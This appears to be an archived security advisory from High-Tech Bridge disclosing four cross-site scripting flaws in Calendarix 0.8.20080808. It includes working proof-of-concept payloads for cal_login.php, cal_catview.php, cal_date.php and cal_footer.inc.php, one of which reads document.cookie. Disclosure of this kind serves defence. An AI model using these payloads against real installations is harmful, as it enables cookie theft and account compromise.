[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22974: Multiple XSS in Calendarix



Vulnerability ID: HTB22974
Reference: http://www.htbridge.ch/advisory/multiple_xss_in_calendarix.html
Product: Calendarix
Vendor: http://www.calendarix.com ( http://www.calendarix.com ) 
Vulnerable Version: 0.8.20080808
Vendor Notification: 26 April 2011 
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/cal_login.php" script to properly sanitize user-supplied input.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
The following PoC is available:


http://[host]/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E


The vulnerability exists due to failure in the "/cal_catview.php" script to properly sanitize user-supplied input in "gocat" variable.
The following PoC is available:


<form action="http://[host]/cal_catview.php?catop=viewcat"; method="post" name="main" />
<input type="hidden" name="gocat" value="'</script><script>alert(document.cookie);</script>"/>
<input type="submit" value="submit"/>
</form>


The vulnerability exists due to failure in the "/cal_date.php" script to properly sanitize user-supplied input in "frmname" variable.
The following PoC is available:


http://[host]/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E


The vulnerability exists due to failure in the "/cal_date.php" script to properly sanitize user-supplied input in "leftfooter" variable when register_globals is on.
The following PoC is available:


http://[host]/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E